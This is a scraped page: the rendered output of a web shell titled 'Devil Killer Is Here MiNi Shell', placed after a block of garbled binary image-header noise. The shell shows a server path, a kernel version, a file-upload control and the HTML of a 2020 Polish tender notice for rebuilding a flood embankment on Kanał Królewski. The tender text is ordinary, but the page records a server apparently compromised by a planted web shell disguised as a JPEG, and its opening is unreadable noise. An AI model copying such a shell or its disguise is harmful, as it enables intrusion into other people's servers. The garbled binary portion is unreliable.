JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200702/557102-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 557102-N-2020 z dnia 2020-07-02 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Państwowe Gospodarstwo Wodne Wody Polskie - Regionalny Zarząd Gospodarki Wodnej w Szczecinie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Odbudowa prawego wału przeciwpowodziowego nad Kanałem Królewskim km 0+000-0+400 wraz z przepustem wałowym” w ramach projektu pn.: „Zabezpieczenie przeciwpowodziowe na terenie Województwa Zachodniopomorskiego”</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Zamówienie jest dofinansowane z budżetu środków europejskich z Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego 2014-2020, Oś Priorytetowa III Ochrona środowiska i adaptacja do zmian klimatu, Działanie 3.2. Zarządzanie ryzykiem powodziowym. Nr projektu RPZP.03.02.00-32- B001/18.</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Państwowe Gospodarstwo Wodne Wody Polskie - Regionalny Zarząd Gospodarki Wodnej w Szczecinie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">36830257500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Grzybowska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">80/82</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">00-844</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">914 411 200, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@szczecin.rzgw.gov.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">914 411 300</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.szczecin.wody.gov.pl /</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Państwowa osoba prawna</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://www.przetargi.wody.gov.pl.</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://www.przetargi.wody.gov.pl.</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Forma pisemna</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Regionalny Zarząd Gospodarki Wodnej w Szczecinie, ul. Tama Pomorzańska 13A; 70-030 Szczecin - do Kancelarii w pokoju 102 (parter)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Odbudowa prawego wału przeciwpowodziowego nad Kanałem Królewskim km 0+000-0+400 wraz z przepustem wałowym” w ramach projektu pn.: „Zabezpieczenie przeciwpowodziowe na terenie Województwa Zachodniopomorskiego”</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">SZ.ROZ.2810.28.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania pn.: „Odbudowa prawego wałuprzeciwpowodziowego nad Kanałem Królewskim w km 0+000-0+400 wraz z przepustem wałowym” wramach projektu pn.: „Zabezpieczenie przeciwpowodziowe na terenie województwaZachodniopomorskiego”. Zadanie polega na wykonaniu robót budowlanych zgodnie dokumentacjąprojektową. Zakres robót obejmuje odbudowę istniejącego wału wraz z elementami towarzyszącymi tj.:1) odcinkiem wału pełniącego funkcję wału czołowego, 2) przepustem wałowym wraz z elementamizamknięć, 3) umocnieniem skarp oraz dna w rejonie przepustu. 2 W zakresie zadania uwzględnia siędziałania związane z realizacją robót budowlanych w oparciu o opracowaną dokumentację projektowąwraz z: 1) wykonaniem kompleksowej dokumentacji powykonawczej zgodnie z obowiązującym prawem,a w tym m. in. inwentaryzacji geodezyjnej powykonawczej; 2) złożeniem wniosku o zakończeniubudowy i uzyskaniem ostatecznej decyzji o pozwoleniu na użytkowanie; 3) sporządzeniem aktualizacjiinwentaryzacji drzew i krzewów wraz z uzyskaniem decyzji o wycince, niezbędnej do realizacji pracprzygotowawczych w procesie budowlanym. 3 Szczegółowy opis oraz zakres przedmiotu zamówieniazawierają: 1) Opis przedmiotu zamówienia - Załącznik Nr 5 do SIWZ, 2) Projekt budowlany - Załączniknr 5a do SIWZ, 3) Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych - Załącznik Nr 5bdo SIWZ, 4) Opinia geotechniczna do projektu budowlanego - Załącznik Nr 5c do SIWZ, 5)Inwentaryzacja drzew i krzewów - Załącznik Nr 5d do SIWZ, 6) Kosztorys nakładczy – Załącznik Nr 5edo SIWZ, 7) Raport o oddziaływaniu przedsięwzięcia na środowisko – Załącznik Nr 5f do SIWZ, 8)Uzyskane decyzje – Załączniki Nr 5g-5j do SIWZ. Zakresem przedmiotu zamówienia jest wykonanierobót budowlanych na podstawie dokumentacji będącej w zasobach Zamawiającego. Przedmiotowainwestycja jest obiektem liniowym położonym w gminie Stepnica, w powiecie Goleniowskim, wwojewództwie Zachodniopomorskim. Rzeczowy odcinek wału podlegający odbudowie rozpoczyna się wrejonie ujścia do rzeki Krępa i biegnie wzdłuż Kanału Królewskiego na odcinku około 400m, gdzienastępnie poprzez wał czołowy łączy się z lewostronnym obwałowaniem rzeczonego kanału. Zamówienieobejmuje wykonanie odbudowy wału przeciwpowodziowego wzdłuż prawego brzegu KanałuKrólewskiego o łącznej długości około 400 m wraz z odbudową wału czołowego (poprzecznego) odługości około 30 m z przepustem wałowym, z zastawkami wrzecionowymi o długości około 13,6m,umocnieniem skarp oraz dna w rejonie przepustu. Projektowany wał przeciwpowodziowy jest obiektemnależącym do pierwszej kategorii geotechnicznej, a warunki gruntowe w podłożu badanego terenu zostałysklasyfikowane jako złożone (Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiejz dnia 25 kwietnia 2012 r. w sprawie ustalania geotechnicznych warunków posadawiania obiektówbudowlanych Dz.U. 2012 poz.463).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45200000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>79421200-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">1385128,61</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-04-30</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2021-04-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Terminy realizacji zamówienia: Wykonawca zobowiązuje się wykonaćprzedmiot zamówienia w całości do dnia 30.04.2021 r. Za datę wykonania przedmiot zamówienia stronyprzyjmują datę podpisania przez Strony Protokołu Odbioru Końcowego, po uzyskaniu ostatecznej decyzjio pozwoleniu na użytkowanie. Wykonawca zobowiązuje się zakończyć wykonywanie robót budowlanychdo dnia 12.03.2021 r. Za datę zakończenia wykonywania robót budowlanych Strony przyjmują datęodbioru robót budowlanych przez Zamawiającego wraz z kompletną dokumentacją odbiorowąpotwierdzoną przez Inspektora Nadzoru Inwestorskiego wraz z wnioskami o pozwolenie na użytkowanieobiektu. Przekazanie terenu budowy Wykonawcy nastąpi w terminie do 7 dni roboczych od daty zawarciaUmowy. Przekazanie Terenu Budowy zostanie potwierdzone Protokołem Przekazania sporządzonymprzez Strony.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia warunku w powyższym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia warunku w powyższym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1) Warunek dotyczący doświadczenia Wykonawców: Celem spełnianiawarunku udziału Wykonawca musi wykazać, że nie wcześniej niż w okresie ostatnich 8 lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,wykonał należycie co najmniej 2 roboty budowlane polegające na wykonaniu robót budowlanychzwiązanych z budową/ przebudową budowli hydrotechnicznych o wartości nie mniejszej niż 500000,00 zł brutto każda lub 1 robotę budowlaną polegającą na wykonaniu budowy/przebudowy budowlihydrotechnicznych o wartości nie mniejszej niż 900 000,00 zł brutto. 2) Warunek dotyczącykwalifikacji osób skierowanych do realizacji zamówienia: Wykonawca wykaże, iż dysponuje lubbędzie dysponował podczas realizacji zamówienia co najmniej jedną (1) osobą odpowiedzialną zakierowanie robotami budowlanymi, posiadającą uprawnienia budowlane do sprawowaniasamodzielnych funkcji w specjalności inżynierii hydrotechnicznej lub odpowiadające tymspecjalnościom inne ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniejobowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w odpowiednim zakresie,będącą członkiem regionalnej Okręgowej Izby Inżynierów Budownictwa lub posiadającą zagraniczneuprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015r. o zasadachuznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej(Dz.U.2016r.,poz.65 z poźn.zm.), która posiada minimum 4 lata doświadczenia zawodowego wzakresie kierowania robotami budowlanymi w zakresie inżynierii hydrotechnicznej.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">Wykonawca może w celu potwierdzenia spełniania warunków udziału wpostępowaniu, w stosownych sytuacjach, polegać na zdolnościach technicznych lub zawodowych lubsytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnegołączących go z nimi stosunków prawnych. W odniesieniu do warunków określonych w pkt III.1.3ogłoszenia, wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertęwspólną (nie musi ich spełniać osobno każdy z Wykonawców składających ofertę wspólną).</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span 